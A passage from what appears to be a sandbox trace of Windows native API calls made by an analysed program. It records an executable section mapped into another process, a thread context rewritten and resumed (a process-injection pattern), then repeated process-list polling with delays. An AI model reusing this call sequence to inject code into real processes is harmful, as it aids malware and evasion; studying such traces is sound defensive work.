[93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.870] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.870] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x10d200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x10e000) returned 0x0 [0195.885] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xbc, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x10d200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x5f0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x10e000) returned 0x0 [0195.902] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.910] NtClose (Handle=0x10c) returned 0x0 [0195.910] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x40fda8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x40fd50, Eip=0x66a707, SegCs=0x23, EFlags=0x246, Esp=0x40fd34, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.910] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.911] NtClose (Handle=0xbc) returned 0x0 [0195.911] NtClose (Handle=0x104) returned 0x0 [0195.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x1d0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0195.918] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0195.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0195.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0196.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0196.040] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0196.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0196.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0196.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0196.238] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0196.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0196.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0196.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0196.412] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0196.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0196.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0196.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0196.563] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0196.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0196.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0196.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0196.705] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0196.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0196.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0196.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0196.821] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0196.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0196.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0196.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0196.927] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0196.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0196.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0197.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0197.087] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0197.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0197.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0197.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0197.354] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0197.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0197.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0197.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0197.492] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0197.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0197.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0197.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0197.606] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0197.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0197.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0197.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0197.729] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0197.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0197.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0197.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0197.838] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0197.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0197.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0197.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0197.944] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0197.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0197.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) 